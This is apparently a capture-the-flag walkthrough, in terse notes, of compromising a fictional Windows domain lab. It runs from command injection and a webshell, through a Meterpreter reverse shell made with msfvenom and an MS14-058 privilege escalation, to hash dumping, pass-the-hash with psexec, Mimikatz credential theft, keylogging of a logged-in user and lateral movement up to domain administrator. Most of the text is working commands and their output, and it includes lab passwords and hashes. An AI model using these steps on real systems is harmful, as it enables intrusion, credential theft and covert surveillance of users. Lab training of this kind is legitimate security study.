http://192.168.8.10
127.0.0.1 | dir
Volume in drive C has no label.
Volume Serial Number is A4A0-78D3
Directory of C:\inetpub\wwwroot
06/10/2016 04:21 PM
.
06/10/2016 04:21 PM
..
02/09/2016 03:27 PM 141 flag-c4f8090e8d371207aa47b616552ad66f.txt
02/09/2016 02:50 PM 432 index.php
02/09/2016 04:18 PM 4,884 super_crappy_webshell.php
3 File(s) 5,457 bytes
2 Dir(s) 5,981,073,408 bytes free
http://192.168.8.15/flag-c4f8090e8d371207aa47b616552ad66f.txt
FLAG-CommandInjectionAsAService
HINT : Now use the hidden webshell to upload and execute a meterpreter.
Ref : http://netsec.ws/?p=331
http://192.168.8.15/super_crappy_webshell.php
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.8.8 LPORT=1234 -f exe > shell.exe
We can start a reverse shell tcp/handler with metasploit …
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
exploit
use the ms14_058_track_popup_menu with a bind_tcp or reverse
use exploit/windows/local/ms14_058_track_popup_menu
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.8.8
C:\>type flag-admins-only.txt
type flag-admins-only.txt
Flag-LookMomImALocalAdmin!
Ensuite, on fait hashdump pour obtenir les hashs des users
use exploit/windows/smb/psexec
set rhost 192.168.8.11
set smbpass aad3b435b51404eeaad3b435b51404ee:d7e233670b66858a436c353b205d4faa
set smbuser it_support
exploit
[*] Started reverse TCP handler on 192.168.8.8:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.8.11:445 as user 'it_support'...
[*] Selecting PowerShell target
[*] 192.168.8.11:445 - Executing the payload...
[+] 192.168.8.11:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957487 bytes) to 192.168.8.11
[*] Meterpreter session 2 opened (192.168.8.8:4444 -> 192.168.8.11:50295) at 2016-08-09 14:06:08 -0400
cd /
ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2016-02-10 12:03:28 -0500 $Recycle.Bin
40777/rwxrwxrwx 0 dir 2009-07-14 01:08:56 -0400 Documents and Settings
40777/rwxrwxrwx 0 dir 2009-07-13 23:20:08 -0400 PerfLogs
40555/r-xr-xr-x 0 dir 2016-02-09 16:59:44 -0500 Program Files
40555/r-xr-xr-x 0 dir 2009-07-14 00:57:06 -0400 Program Files (x86)
40777/rwxrwxrwx 0 dir 2016-02-10 12:06:17 -0500 ProgramData
40777/rwxrwxrwx 0 dir 2016-02-09 16:31:31 -0500 Recovery
40777/rwxrwxrwx 0 dir 2016-08-09 06:16:10 -0400 System Volume Information
40555/r-xr-xr-x 0 dir 2016-02-10 12:34:05 -0500 Users
40777/rwxrwxrwx 0 dir 2016-08-09 03:39:25 -0400 Windows
40777/rwxrwxrwx 0 dir 2016-02-09 16:33:28 -0500 d678c75c649fe4979f61ee29093de8
100666/rw-rw-rw- 198 fil 2016-02-10 12:32:06 -0500 flag-pass-the-hash.txt
100666/rw-rw-rw- 2147016704 fil 2016-08-09 03:49:56 -0400 pagefile.sys
cat flag-pass-the-hash.txt
Flag-AHashIsAPasswordRight?
Hints:
Maybe a privileged user did log into this machine to fix an issue. Check in memory, maybe you could find some useful informations... Wink Wink, Mimikatz!
ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
272 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
300 480 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
328 480 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
336 328 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
376 368 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
384 328 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
416 368 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
480 384 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
488 384 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
496 384 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
560 480 taskhost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\taskhost.exe
588 480 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
664 480 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
736 416 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\LogonUI.exe
752 480 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
788 480 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
812 480 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
936 480 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1048 480 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1172 480 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1256 480 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\msdtc.exe
1264 480 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1624 480 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1848 1008 powershell.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
2272 480 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2656 480 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchIndexer.exe
2684 480 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe
2736 336 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
migrate 788
[*] Migrating from 1848 to 788...
[*] Migration completed successfully.
load kiwi
creds_all
Domain User Password LM Hash NTLM Hash
------ ---- -------- ------- ---------
YOLOCORP it_guy JuvavSecurity2016
use exploit/windows/smb/psexec
set rhost 192.168.8.12
set smbuser it_guy
set smbpassword JuvavSecurity2016
set smbdomain YOLOCORP
exploit
[*] Started reverse TCP handler on 192.168.8.8:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.8.12:445|YOLOCORP as user 'it_guy'...
[*] Selecting PowerShell target
[*] 192.168.8.12:445 - Executing the payload...
[+] 192.168.8.12:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957487 bytes) to 192.168.8.12
[*] Meterpreter session 4 opened (192.168.8.8:4444 -> 192.168.8.12:53552) at 2016-08-09 14:16:36 -0400
cd /
ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2016-02-10 10:55:21 -0500 $Recycle.Bin
40777/rwxrwxrwx 0 dir 2009-07-14 01:08:56 -0400 Documents and Settings
40777/rwxrwxrwx 0 dir 2009-07-13 23:20:08 -0400 PerfLogs
40555/r-xr-xr-x 0 dir 2016-02-09 16:59:44 -0500 Program Files
40555/r-xr-xr-x 0 dir 2009-07-14 00:57:06 -0400 Program Files (x86)
40777/rwxrwxrwx 0 dir 2016-02-10 11:53:06 -0500 ProgramData
40777/rwxrwxrwx 0 dir 2016-02-09 16:31:31 -0500 Recovery
40777/rwxrwxrwx 0 dir 2016-08-09 06:45:22 -0400 System Volume Information
40555/r-xr-xr-x 0 dir 2016-02-10 12:18:35 -0500 Users
40777/rwxrwxrwx 0 dir 2016-08-09 03:34:45 -0400 Windows
40777/rwxrwxrwx 0 dir 2016-02-09 16:33:28 -0500 d678c75c649fe4979f61ee29093de8
100666/rw-rw-rw- 186 fil 2016-02-11 14:27:50 -0500 flag-it-guy.txt
100666/rw-rw-rw- 2147016704 fil 2016-08-09 03:42:55 -0400 pagefile.sys
cat flag-it-guy.txt
Flag-ITGuy,IGotYourPassword!
Hints:
Now You should look for the Domain Admin account password : It is not located on this machine.
Maybe IT guy is actively working now.
Maaaybe...
ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
100 500 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
160 408 conhost.exe x64 1 YOLOCORP\it_guy C:\Windows\System32\conhost.exe
224 500 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe
260 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
356 348 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
396 348 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
408 388 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
444 388 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
500 396 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
516 396 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
524 396 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
580 500 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
628 500 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
700 500 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
708 1016 SearchFilterHost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchFilterHost.exe
804 500 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\msdtc.exe
808 500 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
844 500 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
884 500 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
984 884 wuauclt.exe x64 1 YOLOCORP\it_guy C:\Windows\System32\wuauclt.exe
1016 500 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchIndexer.exe
1092 500 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1124 500 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1164 500 taskhost.exe x64 1 YOLOCORP\it_guy C:\Windows\System32\taskhost.exe
1252 500 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1356 500 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1388 1816 mstsc.exe x64 1 YOLOCORP\it_guy C:\Windows\System32\mstsc.exe
1700 500 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1736 844 dwm.exe x64 1 YOLOCORP\it_guy C:\Windows\System32\dwm.exe
1776 628 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe
1792 500 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe
1816 1868 explorer.exe x64 1 YOLOCORP\it_guy C:\Windows\explorer.exe
1980 2304 powershell.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
1988 500 dllhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dllhost.exe
2052 1016 SearchProtocolHost.exe x64 1 YOLOCORP\it_guy C:\Windows\System32\SearchProtocolHost.exe
2192 356 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
2228 2252 IT_Guy_Simulator.exe x64 1 YOLOCORP\it_guy C:\Users\it_guy\Desktop\IT_Guy_Simulator.exe
2252 884 taskeng.exe x64 1 YOLOCORP\it_guy C:\Windows\System32\taskeng.exe
2576 1816 vmtoolsd.exe x64 1 YOLOCORP\it_guy C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
2676 1016 SearchProtocolHost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchProtocolHost.exe
2716 500 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
migrate 1816
keyscan_start
keyscan_dump
Dumping captured keystrokes...
app <CapsLock> s <CapsLock> erver <CapsLock> a <CapsLock> dministrator <Tab> <CapsLock> s <CapsLock> uper <CapsLock>
d <CapsLock> umb <CapsLock> p <CapsLock> assword1234 <Return> <LWin> mstsc <Return> 192.168.8.13 <Return> app <CapsLock>
s <CapsLock> erver <CapsLock> a <CapsLock> dministrator <Tab> <CapsLock> s <CapsLock> uper <CapsLock> d <CapsLock> umb
<CapsLock> p <CapsLock> assword1234 <Return> <LWin> mstsc <Return> 192.168.8.13 <Return> app <CapsLock> s <CapsLock>
erver <CapsLock> a <CapsLock> dministrator <Tab> <CapsLock> s <CapsLock> uper <CapsLock> d <CapsLock> umb <CapsLock> p
<CapsLock> assword12
// 192.168.8.13 APPSERVER\Administrator SuperDumbPassword1234
###Command
use exploit/windows/smb/psexec
set rhost 192.168.8.13
set smbuser Administrator
set smbpass SuperDumbPassword1234
set smbdomain APPSERVER
exloit
[*] Started reverse TCP handler on 192.168.8.8:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.8.13:445|APPSERVER as user 'Administrator'...
[*] Selecting PowerShell target
[*] 192.168.8.13:445 - Executing the payload...
[+] 192.168.8.13:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957487 bytes) to 192.168.8.13
[*] Meterpreter session 6 opened (192.168.8.8:4444 -> 192.168.8.13:49679) at 2016-08-09 14:28:31 -0400
cd /
ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2009-07-13 22:34:39 -0400 $Recycle.Bin
40777/rwxrwxrwx 0 dir 2009-07-14 01:06:44 -0400 Documents and Settings
40777/rwxrwxrwx 0 dir 2009-07-13 23:20:08 -0400 PerfLogs
40555/r-xr-xr-x 0 dir 2016-07-25 14:33:21 -0400 Program Files
40555/r-xr-xr-x 0 dir 2009-07-14 01:06:53 -0400 Program Files (x86)
40777/rwxrwxrwx 0 dir 2016-07-25 14:33:21 -0400 ProgramData
40777/rwxrwxrwx 0 dir 2016-02-10 21:05:52 -0500 Recovery
40777/rwxrwxrwx 0 dir 2016-02-10 21:03:57 -0500 System Volume Information
40555/r-xr-xr-x 0 dir 2016-02-11 13:42:46 -0500 Users
40777/rwxrwxrwx 0 dir 2016-07-25 14:31:16 -0400 Windows
100666/rw-rw-rw- 133 fil 2016-02-11 14:19:21 -0500 flag.txt
100666/rw-rw-rw- 4294500352 fil 2016-07-25 14:35:01 -0400 pagefile.sys
cat flag.txt
Flag-SpyingOnUsersIsBad
Hint: The Domain administrator is connected to this machine. His password will be somewhere in memory...
ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
228 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
248 476 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
320 312 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
336 320 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
372 364 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
380 312 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
416 364 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
476 380 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
492 380 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
504 380 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
604 476 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
680 476 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
764 476 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
804 476 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
848 476 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
888 476 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
932 476 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1032 476 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1112 476 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1152 604 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wbem\WmiPrvSE.exe
1172 476 VGAuthService.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
1232 476 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1284 2516 powershell.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
1436 476 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1576 476 taskhost.exe x64 1 YOLOCORP\Administrator C:\Windows\System32\taskhost.exe
1616 476 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1652 476 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1680 476 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe
1720 476 dllhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dllhost.exe
1816 476 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\msdtc.exe
1928 1284 notepad.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\notepad.exe
2020 604 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe
2120 888 dwm.exe x64 1 YOLOCORP\Administrator C:\Windows\System32\dwm.exe
2144 2104 explorer.exe x64 1 YOLOCORP\Administrator C:\Windows\explorer.exe
2396 2144 vmtoolsd.exe x64 1 YOLOCORP\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
2700 476 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe
2780 476 WmiApSrv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wbem\WmiApSrv.exe
3044 476 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
migrate 416
[*] Migrating from 1284 to 416...
[*] Migration completed successfully.
load kiwi
creds_all
Domain User Password LM Hash NTLM Hash
------ ---- -------- ------- ---------
YOLOCORP Administrator MegaSecurePassword1337
###Command
msfconsole
use exploit/windows/smb/psexec
set rhost 192.168.8.1
set smbuser Administrator
set smbpass MegaSecurePassword1337
set smbdomain YOLOCORP
exploit
[*] Started reverse TCP handler on 192.168.8.8:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.8.1:445|YOLOCORP as user 'Administrator'...
[*] Selecting PowerShell target
[*] 192.168.8.1:445 - Executing the payload...
[+] 192.168.8.1:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957487 bytes) to 192.168.8.1
[*] Meterpreter session 1 opened (192.168.8.8:4444 -> 192.168.8.1:52457) at 2016-08-09 14:58:13 -0400
cd /
ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2009-07-13 22:34:39 -0400 $Recycle.Bin
40777/rwxrwxrwx 0 dir 2009-07-14 01:06:44 -0400 Documents and Settings
40777/rwxrwxrwx 0 dir 2009-07-13 23:20:08 -0400 PerfLogs
40555/r-xr-xr-x 0 dir 2016-02-09 12:27:32 -0500 Program Files
40555/r-xr-xr-x 0 dir 2016-02-09 12:27:33 -0500 Program Files (x86)
40777/rwxrwxrwx 0 dir 2016-02-10 10:49:07 -0500 ProgramData
40777/rwxrwxrwx 0 dir 2016-02-09 19:21:42 -0500 Recovery
40777/rwxrwxrwx 0 dir 2016-02-09 12:28:04 -0500 System Volume Information
40555/r-xr-xr-x 0 dir 2016-02-09 19:24:03 -0500 Users
40777/rwxrwxrwx 0 dir 2016-06-08 09:49:12 -0400 Windows
100666/rw-rw-rw- 29 fil 2016-06-08 12:44:42 -0400 flag.txt.txt
100666/rw-rw-rw- 4294500352 fil 2016-08-08 15:25:11 -0400 pagefile.sys
cat flag.txt
FLAG-G00dJ0bY0uG0tTh3L4stFl4g